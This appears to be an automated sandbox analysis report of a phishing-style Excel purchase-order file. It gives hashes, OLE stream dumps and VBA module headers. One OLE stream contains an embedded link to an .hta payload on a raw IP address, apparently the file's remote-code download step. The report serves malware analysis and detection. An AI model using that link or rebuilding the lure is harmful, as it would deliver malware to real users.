                Preview:1.1.9.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.6.3.7.8.,.3.7.4.6.3.7.6.,.1.7.8.8.6.5.8.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.1.1.1.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.2.4.6.0.9.2.5.8.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.6.3.7.1.6.9.4.,.2.7.1.5.3.4.9.7.,.5.9.2.2.3.4.2.3.,.1.5.6.1.9.5.8.,.5.7.9.9.9.6.6.1.,.5.8.4.2.5.8.6.0.,.2.7.3.6.0.0.9.5.,.6.3.0.6.3.0.9.9.,.6.3.6.4.3.3.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.1.6.5.7.4.5.3.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.2.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.7.7.1.6.5.7.,.1.3.5.2.5.8.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.3.2.0.5.9.2.7.6.7.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.1.1.9.6.2.9.3.,.
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Reputation:high, very likely benign file
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):165
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:KVC+cAmltV:KVC+cR
                MD5:9C7132B2A8CABF27097749F4D8447635
                SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                Malicious:true
                Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Mar 13 07:45:29 2025, Security: 1
                Entropy (8bit):7.83097068580852
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:PO-ARJ-2025-15ACA.xla.xlsx
                File size:1'172'992 bytes
                MD5:9d0c7d82a1c18e1006e6075584652e83
                SHA1:68f97d343b3419df1b2d25c50c0d72d6af4fd59e
                SHA256:34954100e490a77310918573e56868e651855b54ddb0cc0dd334f55e8e195f14
                SHA512:27c408248899964717c7f99e7b5c0a7a1c54e1ba9e99d4f2810ca32b81830f1f42922fe90a2de261bc2490d92adf003868ba461b6afa40af9459cafec1544076
                SSDEEP:24576:VLA6DHtWjejsk4Mcu+JIwgxIOXR8YhbBWvdp8tLUWBMDcMI:iSaejH4MT+zguM8YkpwLUwhR
                TLSH:DC450294BFC05626DA1D03340FE38B1C5A15AEEA5795620F3235BE1D3EB6B3E0B72509
                File Content Preview:........................>......................................................................................................................................................................................................................................
                Icon Hash:35e58a8c0c8a85b9
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2025-03-13 07:45:29
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f c8 b9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f ec 7d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f 8b 05 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet3"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f 7b a2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.2920681057018664
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                General
                Stream Path:MBD003296A8/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD003296A8/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:296
                Entropy:3.2973193143624515
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                General
                Stream Path:MBD003296A8/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:31156
                Entropy:3.1876994904322484
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                General
                Stream Path:MBD003296A8/MBD00320C7F/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD003296A8/MBD00320C7F/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:613686
                Entropy:7.989056691241232
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD003296A8/MBD00321A49/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD003296A8/MBD00321A49/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:13665
                Entropy:7.1661074658165225
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD003296A8/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:392615
                Entropy:7.73377528201003
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                General
                Stream Path:MBD003296A9/\x1Ole
                CLSID:
                File Type:data
                Stream Size:600
                Entropy:4.504542341869483
                Base64 Encoded:False
                Data ASCII:. . . . I . d J . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . 1 . 9 . 8 . . . 1 . 2 . . . 8 . 9 . . . 2 . 4 . / . x . a . m . p . p . / . k . v . r . m . o . t . / . k . v . r . m . / . g . r . e . a . t . c . o . m . e . b . a . c . k . d . o . i . n . g . f . o . r . e . v . e . r . w . i . t . h . g . r . e . a . t . . . h . t . a . . . } . c 2 k ~ . ; Y . . M . P ~ # . . . . . . . . . . . . . . . . : . . . j . u . l . 8 . i . m . Q . H . R . N . L . i . 4 . k . 6 . a . g .
                Data Raw:01 00 00 02 87 fd 49 10 64 b2 87 4a 00 00 00 00 00 00 00 00 00 00 00 00 be 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ba 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00 39 00 38 00 2e 00 31 00 32 00 2e 00 38 00 39 00 2e 00 32 00 34 00 2f 00 78 00 61 00 6d 00 70 00 70 00 2f 00 6b 00 76 00 72 00 6d 00 6f 00 74 00 2f 00 6b 00 76 00 72 00 6d 00 2f 00 67 00 72 00
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:96277
                Entropy:7.991704392584178
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . u & . . . . # : t . * D J ] 6 [ . . | . . . . . . . . . . . . . . \\ . p . . F . A . F U L L . . . L C . . C 6 | . . D G . @ + . ~ ) u . . . v ] O . - / l ) R 0 0 . - y S f ` . B . . . e a . . . 1 . . . = . . . . J Y . . . . . k . ` . . . . e | . . . . . . . . . . . . . . . W . . . ? . . . K = . . . A z B s . . < @ . . . . H . . . " . . . Y G . . . . 5 w . . . 3 . . . 1 . . . . _ p ; + . & 2 . { 4 + I M . v . 1 . . . . u . 7 . . . I $ } . a . . 2 & 1
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c4 a8 d8 a3 75 26 1e d4 aa c5 da 0a 10 f7 9b 23 9e c0 84 9a c1 3a 74 b7 9c ff d2 b1 2a 44 4a 5d 36 ed e6 5b c8 e7 c1 02 0e ac 7c bc a7 e6 83 a9 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 90 c0 e2 00 00 00 5c 00 70 00 04 46 ee c0 1a 41 c6 bd 46 9b 55 b9 4c ce 4c ae f0 05 1f a3 04 4c e8 43 1d ff
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:519
                Entropy:5.218667437949908
                Base64 Encoded:True
                Data ASCII:I D = " { A B 1 6 6 2 D 3 - 8 1 F 4 - 4 C E 6 - 9 1 2 E - 3 7 2 5 6 2 5 2 2 6 4 5 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 0 0 2 9 C 9 A A 0 9 A A 0 9 A A
                Data Raw:49 44 3d 22 7b 41 42 31 36 36 32 44 33 2d 38 31 46 34 2d 34 43 45 36 2d 39 31 32 45 2d 33 37 32 35 36 32 35 32 32 36 34 35 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:4.000719438931664
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
